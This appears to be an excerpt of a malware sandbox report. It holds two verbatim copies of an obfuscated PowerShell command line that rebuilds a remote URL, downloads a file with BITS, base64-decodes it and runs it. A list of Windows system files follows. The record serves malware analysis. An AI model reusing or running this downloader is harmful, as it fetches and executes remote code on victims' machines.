| cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}" |
| cmdline | powershell "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}" |
| wmi | Select * from Win32_Service |
| file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| file | C:\Windows\System32\ie4uinit.exe |
| file | C:\Program Files\Windows Sidebar\sidebar.exe |
| file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
| file | C:\Windows\System32\xpsrchvw.exe |
| file | C:\Windows\System32\displayswitch.exe |
| file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
| file | C:\Windows\System32\mblctr.exe |
| file | C:\Windows\System32\mstsc.exe |
| file | C:\Windows\System32\SnippingTool.exe |
| file | C:\Windows\System32\SoundRecorder.exe |
| file | C:\Windows\System32\dfrgui.exe |
| file | C:\Windows\System32\msinfo32.exe |
| file | C:\Windows\System32\rstrui.exe |
| file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
| file | C:\Program Files\Windows Journal\Journal.exe |
| file | C:\Windows\System32\MdSched.exe |
| file | C:\Windows\System32\msconfig.exe |
| file | C:\Windows\System32\recdisc.exe |
| file | C:\Windows\System32\msra.exe |